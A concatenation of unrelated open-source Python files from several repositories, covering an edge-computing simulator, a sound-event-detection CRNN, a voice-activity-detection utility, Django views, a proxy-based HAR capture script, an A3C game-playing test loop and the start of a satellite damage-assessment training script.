network_delay_gsm_avg = np.divide(sum(self.network_delay_gsm), len(self.network_delay_gsm),
out=np.zeros_like(sum(self.network_delay_gsm)),
where=len(self.network_delay_gsm),
casting="unsafe")
network_delay_wan_avg = np.divide(sum(self.network_delay_wan), len(self.network_delay_wan),
out=np.zeros_like(sum(self.network_delay_wan)),
where=len(self.network_delay_wan), casting="unsafe")
network_delay_man_avg = np.divide(sum(self.network_delay_man), len(self.network_delay_man),
out=np.zeros_like(sum(self.network_delay_man)),
where=len(self.network_delay_man), casting="unsafe")
network_delay_lan_avg = np.divide(sum(self.network_delay_lan), len(self.network_delay_lan),
out=np.zeros_like(sum(self.network_delay_lan)),
where=len(self.network_delay_lan), casting="unsafe")
service_time_avg = np.divide(sum(self.service_time), len(self.service_time),
out=np.zeros_like(sum(self.service_time)),
where=len(self.service_time), casting="unsafe")
processing_time_avg = np.divide(sum(self.processing_time), len(self.processing_time),
out=np.zeros_like(sum(self.processing_time)),
where=len(self.processing_time), casting="unsafe")
processing_time_cloud_avg = np.divide(sum(self.processing_time_cloud), len(self.processing_time_cloud),
out=np.zeros_like(sum(self.processing_time_cloud)),
where=len(self.processing_time_cloud), casting="unsafe")
processing_time_edge_avg = np.divide(sum(self.processing_time_edge), len(self.processing_time_edge),
out=np.zeros_like(sum(self.processing_time_edge)),
where=len(self.processing_time_edge), casting="unsafe")
processing_time_mobile_avg = np.divide(sum(self.processing_time_mobile), len(self.processing_time_mobile),
out=np.zeros_like(sum(self.processing_time_mobile)),
where=len(self.processing_time_mobile), casting="unsafe")
buffering_time_avg = np.divide(sum(self.buffering_time), len(self.buffering_time),
out=np.zeros_like(sum(self.buffering_time)),
where=len(self.buffering_time), casting="unsafe")
buffering_time_cloud_avg = np.divide(sum(self.buffering_time_cloud), len(self.buffering_time_cloud),
out=np.zeros_like(sum(self.buffering_time_cloud)),
where=len(self.buffering_time_cloud), casting="unsafe")
buffering_time_edge_avg = np.divide(sum(self.buffering_time_edge), len(self.buffering_time_edge),
out=np.zeros_like(sum(self.buffering_time_edge)),
where=len(self.buffering_time_edge), casting="unsafe")
buffering_time_mobile_avg = np.divide(sum(self.buffering_time_mobile), len(self.buffering_time_mobile),
out=np.zeros_like(sum(self.buffering_time_mobile)),
where=len(self.buffering_time_mobile), casting="unsafe")
result = {
"completed_task": {
"total_completed_task": completed_task_sum,
"completed_task_cloud" : completed_task_cloud_sum,
"completed_task_edge": completed_task_edge_sum,
"completed_task_mobile": completed_task_mobile_sum
},
"service_time" : service_time_avg.tolist(),
"processing_delay": {
"processing_time" : processing_time_avg.tolist(),
"processing_time_cloud_avg": processing_time_cloud_avg.tolist(),
"processing_time_edge_avg": processing_time_edge_avg.tolist(),
"processing_time_mobile_avg": processing_time_mobile_avg.tolist()
},
"network_delay": {
"network_time": network_delay_avg.tolist(),
"network_delay_gsm": network_delay_gsm_avg.tolist(),
"network_delay_wan": network_delay_wan_avg.tolist(),
"network_delay_man": network_delay_man_avg.tolist(),
"network_delay_lan": network_delay_lan_avg.tolist(),
},
"buffering_delay": {
"buffering_time": buffering_time_avg.tolist(),
"buffering_time_cloud": buffering_time_cloud_avg.tolist(),
"buffering_time_edge": buffering_time_edge_avg.tolist(),
"buffering_time_mobile": buffering_time_mobile_avg.tolist()
}
}
with open(self.file_name, 'w', encoding="utf-8") as make_file:
json.dump(result, make_file, ensure_ascii=False, indent=4)
def task_end(self, task):
self.record_log(task)
def record_log(self, task):
# type = task.get_task_type()
# processing time
self.processing_time_cloud.append(task.get_processing_time(self.device_type["cloud"]))
self.processing_time_edge.append(task.get_processing_time(self.device_type["edge"]))
self.processing_time_mobile.append(task.get_processing_time(self.device_type["mobile"]))
processing_time = task.get_processing_time_sum()
self.processing_time.append(processing_time)
# buffering time
self.buffering_time_cloud.append((task.get_buffering_time(self.device_type["cloud"])))
self.buffering_time_edge.append(task.get_buffering_time(self.device_type["edge"]))
self.buffering_time_mobile.append(task.get_buffering_time(self.device_type["mobile"]))
buffering_time = task.get_buffering_time_sum()
self.buffering_time.append(buffering_time)
# network delay
self.network_delay_gsm.append(task.get_network_delay(0))
self.network_delay_wan.append(task.get_network_delay(1))
self.network_delay_man.append(task.get_network_delay(2))
self.network_delay_lan.append(task.get_network_delay(3))
network_delay = task.get_network_delay(0) + task.get_network_delay(1) + \
task.get_network_delay(2) + task.get_network_delay(3)
self.network_delay.append(network_delay)
# service time
service_time = processing_time + buffering_time + network_delay
self.service_time.append(service_time)
if task.get_task_deadline() > service_time:
self.completed_task += 1
if task.get_finish_node() == 0:
self.completed_task_mobile += 1
elif task.get_finish_node() == 1:
self.completed_task_edge += 1
elif task.get_finish_node() == 2:
self.completed_task_cloud += 1
```
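Every average in `sim_stop` is computed with `np.divide(..., out=..., where=...)` so that an empty metric list yields 0 instead of raising a division-by-zero warning. A compact sketch of that guard, with toy inputs:
```python
# Sketch of the guarded-average pattern used throughout Log.sim_stop.
import numpy as np

def safe_avg(values):
    total = float(sum(values))
    # where=False leaves `out` untouched, so empty lists average to 0.0.
    return np.divide(total, len(values),
                     out=np.zeros_like(np.asarray(total)),
                     where=len(values) != 0,
                     casting="unsafe")

print(safe_avg([1.0, 2.0, 4.0]))  # 2.333...
print(safe_avg([]))               # 0.0
```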
#### File: ECOS/ecos/simulator.py
```python
import json
from enum import Enum
from ecos.event import Event
from ecos.task_generator import Task_generator
from ecos.log import Log
from ecos.topology import Topology
# 2022.01.07
class Simulator:
_instance = None
@classmethod
def get_instance(cls):
if not cls._instance:
cls._instance = Simulator()
return cls._instance
def __init__(self):
self.taskQueue = list()
self.terminate_time = 0
# type configuration
self.eventTag = self.my_enum('send', 'create', 'processing', "transmission", "progress", "stop")
self.node_type = self.my_enum("Mobile", "Edge", "Cloud")
self.network_type = self.my_enum("WLAN", "MAN", "WAN")
self.entity_state = Enum("EntityState", ["FINISHED", "RUNNABLE"])
# simulation set
self.running = False
self.clock = 0
self.warmUpPeriod = 0
self.intervalToGetLoadLog = 0
self.abruptTerminate = False
self.sim_scenario = None
self.orchestrator_policy = None
self.scenario_factory = None
self.entities = None
self.file_log_enable = True
# network setting
self.network_properties = None
# number of computing node setting
self.minNumOfMobileDevice = 0
self.maxNumOfMobileDevice = 0
self.mobileDeviceCounterSize = 0
self.numOfEdge = 0
self.num_device = 0
#minseon server id setting
#self.CloudId = None
#self.EdgeId = None
# task configuration
self.task_look_up_table = list()
self.task_generator = None
def initialize(self, configure, _network, _app, _num_of_edge, policy):
self.terminate_time = int(configure["simulation_time"]) * 60
self.orchestrator_policy = policy
self.minNumOfMobileDevice = int(configure["min_num_of_mobile_device"])
self.maxNumOfMobileDevice = int(configure["max_num_of_mobile_device"])
self.mobileDeviceCounterSize = int(configure["mobile_device_counter"])
self.sim_scenario = configure["simul_scenario"]
self.numOfEdge = _num_of_edge
self.network_properties = _network
# self.topology.link_configure(_network)
self.task_look_up_table = _app
return True
def set_simulation_factory(self, _scenario_factory):
self.scenario_factory = _scenario_factory
self.entities = [_scenario_factory.get_edge_manager(),
_scenario_factory.get_cloud_manager(),
_scenario_factory.get_device_manager()]
def get_scenario_factory(self):
return self.scenario_factory
def set_mobile_device(self, _num_device):
self.num_device = _num_device
self.task_generator = Task_generator(_num_device, self.task_look_up_table)
def get_warmup_period(self):
return self.warmUpPeriod
def get_task_look_up_table(self):
return self.task_look_up_table
def get_load_log_interval(self):
return self.intervalToGetLoadLog
def get_file_log_enable(self):
return self.file_log_enable
def get_network_properties(self):
return self.network_properties
def get_min_num_of_mobile_device(self):
return self.minNumOfMobileDevice
def get_max_num_of_mobile_device(self):
return self.maxNumOfMobileDevice
def get_num_of_mobile_device(self):
return self.num_device
def get_num_of_edge(self):
return self.numOfEdge
def get_orchestration_policy(self):
return self.orchestrator_policy
def get_simulation_scenario(self):
return self.sim_scenario
def get_clock(self):
return self.clock
def start_simulator(self):
#
print("start simulation")
self.run()
def run(self):
if self.running is False:
self.running = True
# check entities
for item in self.entities:
item.start_entity()
self.clock = 0
self.task_generator.create_task(self.terminate_time)
print("Task creation is completed: ", len(self.task_generator.get_task()))
# schedule the task
for task in self.task_generator.get_task():
event = Event({"task": "create"}, task, task.get_birth_time())
self.send_event(event)
# schedule main object
# progress
event = Event({"simulation": "progress"}, None, self.terminate_time/100)
self.send_event(event)
# stop
event = Event({"simulation": "stop"}, None, self.terminate_time)
self.send_event(event)
while True:
if self.run_clock_tick() and self.abruptTerminate:
break
if self.clock >= self.terminate_time > 0.0:
self.run_stop()
self.clock = self.terminate_time
break
clock = self.clock
self.finish_simulation()
self.run_stop()
return clock
def run_stop(self):
for entity in self.entities:
entity.shutdown_entity()
self.running = False
def finish_simulation(self):
#
if self.abruptTerminate is True:
for ent in self.entities:
if ent.get_state() != self.entity_state.FINISHED:
ent.run()
for ent in self.entities:
ent.shutdown_entity()
Log.get_instance().sim_stop()
def run_clock_tick(self):
#
queue_empty = False
for item in self.entities:
if item.get_state() == self.entity_state.RUNNABLE:
item.run()
if len(self.taskQueue) > 0:
event_list = list()
event = None
# integer max value
time = 9223372036854775807
for i in self.taskQueue:
i.get_time()
if i.get_time() < time:
time = i.get_time()
event = i
event_list.append(event)
for i in self.taskQueue:
if event == i:
continue
if time == i.get_time():
event_list.append(i)
# remove event in task queue
for item in event_list:
self.taskQueue.remove(item)
for item in self.taskQueue:
event_time = item.get_time()
update_time = event_time - event.get_time()
if update_time < 0:
update_time = 0
item.update_time(update_time)
# print(event.get_time())
self.clock += event.get_time()
self.process_event(event_list)
else:
queue_empty = True
self.running = False
print("Simulation: No more events")
return queue_empty
def process_event(self, event):
for evt in event:
msg = evt.get_message()
# print(msg, ":", evt.get_time())
# event described by json
# call the event depend on the function
if msg.get("task"):
#
if msg.get("task") == "create":
# task create
self.scenario_factory.get_device_manager().get_offload_target(evt.get_task())
elif msg.get("task") == "send":
# send the task
task = evt.get_task()
self.scenario_factory.network_model.enqueue(task)
elif msg.get("task") == "processing":
# task processing in node
# check each node
if msg["detail"]["source"] == -1:
self.scenario_factory.get_edge_manager().receive_task_from_device(evt)
elif msg["detail"]["source"] == 0:
self.scenario_factory.get_cloud_manager().receive_task(evt)
else:
self.scenario_factory.get_edge_manager().receive_task_from_edge(evt)
elif msg.get("task") == "check":
if msg["detail"]["node"] == "device":
device = self.entities[2].get_node_list()[msg["detail"]["id"]]
device.update_task_state(self.clock)
elif msg["detail"]["node"] == "edge":
edge = self.entities[0].get_node_list()[msg["detail"]["id"] - 1]
edge.update_task_state(self.clock)
elif msg["detail"]["node"] == "cloud":
cloud = self.entities[1].get_node_list()[msg["detail"]["id"]]
cloud.update_task_state(self.clock)
elif msg.get("network"):
#
if msg.get("network") == "transmission":
# send task to cloud (finish)
if msg["detail"]["type"] == 0:
link = msg["detail"]["link"]
link.update_send_task(evt.get_task())
msgg = {
"task": "processing",
"detail": {
"source": 0
}
}
evt.get_task().set_network_delay(self.get_clock(), 1)
evtt = Event(msgg, evt.get_task(), 0)
self.send_event(evtt)
else:
# send task to edge
# link
link = msg["detail"]["link"]
link.update_send_task(evt.get_task())
# update msg
route_list = msg["detail"]["route"]
route_list.remove(int(msg["detail"]["source"]))
delay = 0
if len(route_list) <= 1:
typ = msg["detail"]["type"]
msgg = {
"task": "processing",
"detail" : {
"source": typ,
"route": route_list
}
}
evt.get_task().set_network_delay(self.get_clock(), 2)
et = Event(msgg, evt.get_task(), delay)
self.send_event(et)
else:
source_edge = route_list[0]
dest = route_list[1]
updated_link = link
# find link
for lnk in self.scenario_factory.get_edge_manager().get_link_list():
lnk_status = lnk.get_link()
if source_edge == lnk_status[0] and dest == lnk_status[1]:
updated_link = lnk
delay = lnk.get_download_delay(evt.get_task())
msg["detail"]["delay"] = delay
msg["detail"]["link"] = updated_link
et = Event(msg, evt.get_task(), delay)
self.send_event(et)
elif msg.get("simulation"):
if msg.get("simulation") == "progress":
#
progress = int((self.clock * 100)/self.terminate_time)
if progress % 10 == 0:
print(progress, end='')
else:
print(".", end='')
if self.clock <= self.terminate_time:
evt.update_time(self.terminate_time/100)
self.send_event(evt)
elif msg.get("simulation") == "stop":
#
self.finish_simulation()
def send_event(self, event):
#
self.taskQueue.append(event)
@staticmethod
def my_enum(*sequential, **named):
enums = dict(zip(sequential, range(len(sequential))), **named)
return type('Enum', (), enums)
def parse_json_file(self, file):
json_file = json.dumps(file, indent=4)
return json_file
``` |
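`Simulator.my_enum` builds a lightweight enum by mapping the given names onto consecutive integers (keyword arguments become explicit values). A standalone sketch of what it returns, re-declared here for illustration:
```python
# Standalone copy of my_enum, showing the event-tag mapping it produces.
def my_enum(*sequential, **named):
    enums = dict(zip(sequential, range(len(sequential))), **named)
    return type('Enum', (), enums)

EventTag = my_enum('send', 'create', 'processing', 'transmission', 'progress', 'stop')
assert EventTag.send == 0 and EventTag.stop == 5

NodeType = my_enum('Mobile', 'Edge', 'Cloud', UNKNOWN=-1)
assert NodeType.Cloud == 2 and NodeType.UNKNOWN == -1
```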
{
"source": "JinhuaLiang/CS4347_SED_GroupProjec",
"score": 2
} |
#### File: CS4347_SED_GroupProjec/pytorch/models.py
```python
import os
import sys
import math
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.parameter import Parameter
from torchlibrosa.stft import Spectrogram, LogmelFilterBank
from torchlibrosa.augmentation import SpecAugmentation
from pytorch_utils import do_mixup
def init_layer(layer):
"""Initialize a Linear or Convolutional layer. """
nn.init.xavier_uniform_(layer.weight)
if hasattr(layer, 'bias'):
if layer.bias is not None:
layer.bias.data.fill_(0.)
def init_bn(bn):
"""Initialize a Batchnorm layer. """
bn.bias.data.fill_(0.)
bn.weight.data.fill_(1.)
def init_gru(rnn):
"""Initialize a GRU layer. """
def _concat_init(tensor, init_funcs):
(length, fan_out) = tensor.shape
fan_in = length // len(init_funcs)
for (i, init_func) in enumerate(init_funcs):
init_func(tensor[i * fan_in : (i + 1) * fan_in, :])
def _inner_uniform(tensor):
fan_in = nn.init._calculate_correct_fan(tensor, 'fan_in')
nn.init.uniform_(tensor, -math.sqrt(3 / fan_in), math.sqrt(3 / fan_in))
for i in range(rnn.num_layers):
_concat_init(
getattr(rnn, 'weight_ih_l{}'.format(i)),
[_inner_uniform, _inner_uniform, _inner_uniform]
)
torch.nn.init.constant_(getattr(rnn, 'bias_ih_l{}'.format(i)), 0)
_concat_init(
getattr(rnn, 'weight_hh_l{}'.format(i)),
[_inner_uniform, _inner_uniform, nn.init.orthogonal_]
)
torch.nn.init.constant_(getattr(rnn, 'bias_hh_l{}'.format(i)), 0)
class Block(nn.Module):
def __init__(self, in_channels, out_channels):
super(Block, self).__init__()
self.conv = nn.Conv2d(in_channels=in_channels,
out_channels=out_channels,
kernel_size=(3, 3), stride=(1, 1),
padding=(1, 1), bias=False)
self.bn = nn.BatchNorm2d(out_channels)
self.init_weight()
def init_weight(self):
init_layer(self.conv)
init_bn(self.bn)
def forward(self, input):
x = input
x = self.bn(self.conv(x))
x = F.glu(x, dim=1) # (batch_size, channels, time_steps, mel_bins)
return x
class AttBlock(nn.Module):
def __init__(self, n_in, n_out, activation='linear', temperature=1.):
super(AttBlock, self).__init__()
self.activation = activation
self.temperature = temperature
self.att = nn.Conv1d(in_channels=n_in, out_channels=n_out, kernel_size=1, stride=1, padding=0, bias=True)
self.cla = nn.Conv1d(in_channels=n_in, out_channels=n_out, kernel_size=1, stride=1, padding=0, bias=True)
self.bn_att = nn.BatchNorm1d(n_out)
self.init_weights()
def init_weights(self):
init_layer(self.att)
init_layer(self.cla)
init_bn(self.bn_att)
def forward(self, x):
# x: (n_samples, n_in, n_time)
tmp = self.att(x)
tmp = torch.clamp(tmp, -10, 10)
att = torch.exp(tmp / self.temperature) + 1e-6
norm_att = att / torch.sum(att, dim=2)[:, :, None]
cla = self.nonlinear_transform(self.cla(x))
x = torch.sum(norm_att * cla, dim=2)
return x, norm_att, cla
def nonlinear_transform(self, x):
if self.activation == 'linear':
return x
elif self.activation == 'sigmoid':
return torch.sigmoid(x)
# The following CRNN architecture is designed following Yong Xu's code:
# https://github.com/yongxuUSTC/dcase2017_task4_cvssp
class Cnn_Gru(nn.Module):
def __init__(self, sample_rate, window_size, hop_size, mel_bins, fmin,
fmax, classes_num):
super(Cnn_Gru, self).__init__()
window = 'hann'
center = False
pad_mode = 'reflect'
ref = 1.0
amin = 1e-10
top_db = None
# Spectrogram extractor
self.spectrogram_extractor = Spectrogram(n_fft=window_size, hop_length=hop_size,
win_length=window_size, window=window, center=center, pad_mode=pad_mode,
freeze_parameters=True)
# Logmel feature extractor
self.logmel_extractor = LogmelFilterBank(sr=sample_rate, n_fft=window_size,
n_mels=mel_bins, fmin=fmin, fmax=fmax, ref=ref, amin=amin, top_db=top_db,
freeze_parameters=True)
# Spec augmenter
self.spec_augmenter = SpecAugmentation(time_drop_width=16, time_stripes_num=2,
freq_drop_width=8, freq_stripes_num=2)
self.bn0 = nn.BatchNorm2d(mel_bins)
self.block1 = Block(in_channels=1, out_channels=128)
self.block2 = Block(in_channels=64, out_channels=128)
self.block3 = Block(in_channels=64, out_channels=128)
self.block4 = Block(in_channels=64, out_channels=128)
self.block5 = Block(in_channels=64, out_channels=128)
self.block6 = Block(in_channels=64, out_channels=128)
self.block7 = Block(in_channels=64, out_channels=128)
self.block8 = Block(in_channels=64, out_channels=128)
self.conv9 = nn.Conv2d(in_channels=64,
out_channels=256,
kernel_size=(3, 3), stride=(1, 1),
padding=(1, 1), bias=True)
self.bigru = nn.GRU(input_size=256, hidden_size=128, num_layers=1,
bias=True, batch_first=True, bidirectional=True)
self.bigru_g = nn.GRU(input_size=256, hidden_size=128, num_layers=1,
bias=True, batch_first=True, bidirectional=True)
self.att_block = AttBlock(n_in=256, n_out=classes_num, activation='sigmoid')
self.init_weights()
def init_weights(self):
init_bn(self.bn0)
init_layer(self.conv9)
init_gru(self.bigru)
init_gru(self.bigru_g)
def forward(self, input, mixup_lambda=None):
x = self.spectrogram_extractor(input) # (batch_size, 1, time_steps, freq_bins)
x = self.logmel_extractor(x) # (batch_size, 1, time_steps, mel_bins)
x = x.transpose(1, 3)
x = self.bn0(x)
x = x.transpose(1, 3)
if self.training:
x = self.spec_augmenter(x)
# Mixup on spectrogram
if self.training and mixup_lambda is not None:
x = do_mixup(x, mixup_lambda)
x = self.block1(x)
x = self.block2(x)
x = F.max_pool2d(x, kernel_size=(1, 2))
x = self.block3(x)
x = self.block4(x)
x = F.max_pool2d(x, kernel_size=(1, 2))
x = self.block5(x)
x = self.block6(x)
x = F.max_pool2d(x, kernel_size=(1, 2))
x = self.block7(x)
x = self.block8(x)
x = F.max_pool2d(x, kernel_size=(1, 2))
x = F.relu_(self.conv9(x))
(x, _) = torch.max(x, dim=3)
x = x.transpose(1, 2) # (batch_size, time_steps, channels)
(rnnout, _) = self.bigru(x)
(rnnout_gate, _) = self.bigru_g(x)
x = rnnout.transpose(1, 2) * rnnout_gate.transpose(1, 2)
"""x.shape = (batch_size, channels, time_steps)"""
(clipwise_output, norm_att, cla) = self.att_block(x)
"""cla.shape = (batch_size, classes_num, time_steps)"""
output_dict = {
'framewise_output': cla.transpose(1, 2),
'clipwise_output': clipwise_output,
'embedding': cla}
return output_dict
```
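A quick shape check for the attention pooling in `AttBlock`: the block turns frame-level features into clip-level predictions plus per-frame attention weights. The tensors are random, the class count of 17 is an arbitrary assumption, and only `torch` is needed.
```python
# Shape sketch for AttBlock (random tensors; 17 classes is an arbitrary choice).
import torch

att_block = AttBlock(n_in=256, n_out=17, activation='sigmoid')
x = torch.randn(4, 256, 100)               # (batch, channels, time_steps)

clipwise, norm_att, cla = att_block(x)
print(clipwise.shape)   # torch.Size([4, 17])       clip-level output
print(norm_att.shape)   # torch.Size([4, 17, 100])  attention weights (sum to 1 over time)
print(cla.shape)        # torch.Size([4, 17, 100])  frame-level output
```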
#### File: CS4347_SED_GroupProjec/utils/vad.py
```python
import numpy as np
def activity_detection(x, thres, low_thres=None, n_smooth=1, n_salt=0):
"""Activity detection.
Args:
x: array
thres: float, threshold
low_thres: float, second, lower threshold
n_smooth: integer, number of frames to smooth.
n_salt: integer, segments equal to or shorter than this many frames will be
removed. Setting this value to 0 disables salt-noise removal.
Return: list of [bgn, fin]
"""
locts = np.where(x > thres)[0]
# Find pairs of [bgn, fin]
bgn_fin_pairs = find_bgn_fin_pairs(locts)
# Second threshold
if low_thres is not None:
bgn_fin_pairs = activity_detection_with_second_thres(
x, bgn_fin_pairs, low_thres)
# Smooth
bgn_fin_pairs = smooth(bgn_fin_pairs, n_smooth)
# Remove salt noise
bgn_fin_pairs = remove_salt_noise(bgn_fin_pairs, n_salt)
return bgn_fin_pairs
def find_bgn_fin_pairs(locts):
"""Find pairs of [bgn, fin] from loctation array
"""
if len(locts)==0:
return []
else:
bgns = [locts[0]]
fins = []
for i1 in range(1, len(locts) - 1): # range from locts[1] to locts[-2]
if locts[i1] - locts[i1 - 1] > 1:
fins.append(locts[i1 - 1] + 1)
bgns.append(locts[i1] + 1)
fins.append(locts[-1])
assert len(bgns)==len(fins)
lists = []
for i1 in range(len(bgns)):
lists.append([bgns[i1], fins[i1]])
return lists
def activity_detection_with_second_thres(x, bgn_fin_pairs, thres):
"""Double threshold method.
"""
new_bgn_fin_pairs = []
for [bgn, fin] in bgn_fin_pairs:
while(bgn != -1):
if x[bgn] < thres:
break
bgn -= 1
while(fin != len(x)):
if x[fin] < thres:
break
fin += 1
new_bgn_fin_pairs.append([bgn + 1, fin])
new_bgn_fin_pairs = smooth(new_bgn_fin_pairs, n_smooth=1)
return new_bgn_fin_pairs
def smooth(bgn_fin_pairs, n_smooth):
"""Smooth the [bgn, fin] pairs.
"""
new_bgn_fin_pairs = []
if len(bgn_fin_pairs) == 0:
return []
[mem_bgn, fin] = bgn_fin_pairs[0]
for n in range(1, len(bgn_fin_pairs)):
[pre_bgn, pre_fin] = bgn_fin_pairs[n - 1]
[bgn, fin] = bgn_fin_pairs[n]
if bgn - pre_fin <= n_smooth:
pass
else:
new_bgn_fin_pairs.append([mem_bgn, pre_fin])
mem_bgn = bgn
new_bgn_fin_pairs.append([mem_bgn, fin])
return new_bgn_fin_pairs
def remove_salt_noise(bgn_fin_pairs, n_salt):
"""Remove salt noise
"""
new_bgn_fin_pairs = []
for [bgn, fin] in bgn_fin_pairs:
if fin - bgn <= n_salt:
pass
else:
new_bgn_fin_pairs.append([bgn, fin])
return new_bgn_fin_pairs
``` |
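A small end-to-end example of `activity_detection` on a synthetic score curve. The array and thresholds are made up; note how the lower threshold plus smoothing bridges the two bursts into a single `[bgn, fin]` segment.
```python
# Usage sketch for activity_detection above, on a synthetic score curve.
import numpy as np

from vad import activity_detection  # adjust the import to wherever utils/vad.py lives

x = np.array([0.1, 0.2, 0.9, 0.95, 0.3, 0.1, 0.8, 0.85, 0.9, 0.2])
segments = activity_detection(x, thres=0.5, low_thres=0.25, n_smooth=2, n_salt=1)
print(segments)  # [[2, 9]] - the low threshold and smoothing merge the two bursts
```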
{
"source": "JinhuaSu/Battleship",
"score": 2
} |
#### File: Battleship/Battleship/views.py
```python
from django.http import HttpResponse
from django.shortcuts import render
def hello(request):
return HttpResponse("Hello world ! ")
def Battleship(request):
context = {}
context['hello'] = 'Hello World!'
context['rows'] = [str(i) for i in range(7)]
context['columns'] = [str(i) for i in range(7)]
return render(request, 'Battleship.html',context)
``` |
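For completeness, this is roughly how the two views above would be wired into a URLconf; the `urls.py` below is hypothetical and not taken from the repository.
```python
# Hypothetical urls.py for the views above (not from the repo).
from django.urls import path

from Battleship import views

urlpatterns = [
    path('hello/', views.hello, name='hello'),
    path('battleship/', views.Battleship, name='battleship'),
]
```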
{
"source": "JinhuaSu/RMusicDown",
"score": 3
} |
#### File: RMusicDown/py/har_test.py
```python
from browsermobproxy import Server
from selenium.webdriver.firefox.options import Options
from selenium import webdriver
import time
import pprint
class ProxyManger:
__BMP = "../../browsermob-proxy-2.1.4/bin/browsermob-proxy"
def __init__(self):
self.__server = Server(ProxyManger.__BMP)
self.__client = None
def start_server(self):
self.__server.start()
return self.__server
def start_client(self):
self.__client = self.__server.create_proxy()
# params={"trustAllServers": "true"}
return self.__client
@property
def client(self):
return self.__client
@property
def server(self):
return self.__server
if __name__ == "__main__":
# start the proxy
proxy = ProxyManger()
server = proxy.start_server()
time.sleep(1)
client = proxy.start_client()
# configure the proxy and start the WebDriver
options = webdriver.ChromeOptions()
# options = Options()
options.add_argument("--proxy-server={}".format(client.proxy))
options.add_argument("--ignore-certificate-errors")
# options.headless = True
# driver = webdriver.Firefox(options=options)
chromePath = "/home/su/app/crawler/stock_post_crawler/chromedriver"
driver = webdriver.Chrome(executable_path=chromePath, chrome_options=options)
# capture the returned content
client.new_har("baidu.com")
driver.get("https://www.baidu.com/")
time.sleep(3)
newHar = client.har
pprint.pprint(newHar)
server.stop()
``` |
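`client.har` returns a plain dict in the standard HAR 1.2 layout (`log.entries[].request/response`), so the captured traffic can be post-processed directly. A short sketch, assuming `newHar` is the dict captured by the script above:
```python
# Post-processing sketch for the HAR dict captured above (standard HAR 1.2 layout).
for entry in newHar["log"]["entries"]:
    url = entry["request"]["url"]
    status = entry["response"]["status"]
    took_ms = entry["time"]
    print(f"{status} {took_ms:8.1f} ms  {url}")
```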
{
"source": "JinhuaSu/sfiiia-a3c",
"score": 2
} |
#### File: sfiiia-a3c/src/test.py
```python
import time
from collections import deque
import torch
import torch.nn.functional as F
from env.envs import create_atari_env
from models.model import ActorCritic
from env.Environment import Environment
# I need to fully understand the whole structure of the model, and sip some VITA tea to keep my temper ("baozou") under control
import scipy.misc
def test(rank, args, shared_model,model, counter):
torch.manual_seed(args.seed + rank)
save_img = True if args.img_path != "" else False
device = args.use_gpu[rank%len(args.use_gpu)] if len(args.use_gpu) > 0 else -1
device = 0
if args.play_sf:
roms_path = args.roms # Replace this with the path to your ROMs
if args.mode == 'PvP':
print('PvP throttle:%s'%args.throttle)
env = Environment("env"+str(rank), roms_path,difficulty=args.difficulty,frame_ratio =3,frames_per_step = 1,throttle =args.throttle)
else:
env = Environment("env"+str(rank), roms_path,difficulty=args.difficulty,frame_ratio =3,frames_per_step = 1,throttle =False)
env.start()
state, reward, round_done, stage_done, done = env.step(8, 9)
state = state.T
else:
env = create_atari_env(args.env_name)
env.seed(args.seed + rank)
model = ActorCritic(env.observation_space.shape[0], env.action_space.n)
state = env.reset()
model.eval()
state = torch.from_numpy(state)
if device >=0:
state = state.to(device)
reward_sum = 0
done = True
start_time = time.time()
# a quick hack to prevent the agent from stucking
actions = deque(maxlen=100)
episode_length = 0
step = 0
while True:
# Sync with the shared model
if done:
num_stage = 0
print('test start!')
model.load_state_dict(shared_model.state_dict())
cx = torch.zeros(1, 1024)
hx = torch.zeros(1, 1024)
if device >=0:
cx = cx.to(device)
hx = hx.to(device)
else:
cx = cx.detach()
hx = hx.detach()
episode_length += 1
with torch.no_grad():
value, logit, (hx, cx) = model((state.float().unsqueeze(0), (hx, cx)))
prob = F.softmax(logit, dim=-1)
action = prob.multinomial(num_samples=1).detach()
#action = prob.max(1, keepdim=True)[1].cpu().numpy()
if args.play_sf:
action_id = action.cpu().numpy()[0,0]
if action_id < 90:
move_action, attack_action = action_id//10,action_id%10
else:
move_action, attack_action = -1,action_id%90
state, reward, round_done, stage_done, done = env.step(move_action, attack_action)
reward = reward[args.reward_mode]
if save_img and step == 0:
scipy.misc.toimage(state).save(args.img_path+'action(%s)_%s.png'%(action_id,episode_length))# save the frame as an image
state = state.T
if done:
env.new_game()
if stage_done:
num_stage += 1
env.next_stage()
if round_done:
env.next_round()
else:
state, reward, done, _ = env.step(action[0, 0])
reward_sum += reward
# a quick hack to prevent the agent from stucking
actions.append(action[0, 0])
#if args.mode == 'train' and actions.count(actions[0]) == actions.maxlen:
# done = True
if done:
print("Time {}, num steps {}, FPS {:.0f}, episode reward {}, episode length {}, win_stage_num {}".format(
time.strftime("%Hh %Mm %Ss",
time.gmtime(time.time() - start_time)),
counter.value, counter.value / (time.time() - start_time),
reward_sum, episode_length,num_stage))
step += 1
if args.mode == 'train' and step % args.save_per_min == 0:
print('saving model params at step %s' % step)
torch.save(shared_model.state_dict(),'%s/model_params_step_%s.pkl' %(args.model_path+args.reward_mode,step))
reward_sum = 0
episode_length = 0
actions.clear()
if args.play_sf:
env.new_game()
state, reward, _, _, _ = env.step(8, 9)
state = state.T
reward = reward[args.reward_mode]
else:
state = env.reset()
if args.mode == 'train':
print('test mode sleep for 60 seconds')
time.sleep(60)
state = torch.from_numpy(state)
if device >=0:
state = state.to(device)
reward = torch.tensor(reward)
reward = reward.to(device)
``` |
{
"source": "JinhuaSu/xview2_1st_place_solution",
"score": 2
} |
#### File: xview2_1st_place_solution/train_src/train_student_building.py
```python
import os
os.environ["MKL_NUM_THREADS"] = "1"
os.environ["NUMEXPR_NUM_THREADS"] = "1"
os.environ["OMP_NUM_THREADS"] = "1"
from os import path, makedirs, listdir
import sys
import numpy as np
np.random.seed(1)
import random
random.seed(1)
import torch
from torch import nn
from torch.backends import cudnn
from torch.utils.data import Dataset
from torch.utils.data import DataLoader
import torch.optim.lr_scheduler as lr_scheduler
import time
eps = 1e-6
from apex import amp
from util.adamw import AdamW
from util.losses import dice_round, ComboLoss
import pandas as pd
from tqdm import tqdm
import timeit
import cv2
from zoo.models import (
SeResNext50_Unet_Loc,
SeResNext50_Unet_Loc_KD,
SeResNext50_Unet_Double,
)
from imgaug import augmenters as iaa
from util.utils import *
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
import gc
from util.emailbox import EmailBot
import argparse
from util.mongo_logger import Logger
DB = "building_damage_kd"
COLLECTION = "v3_loc"
logger = Logger(DB, COLLECTION)
parser = argparse.ArgumentParser()
parser.add_argument(
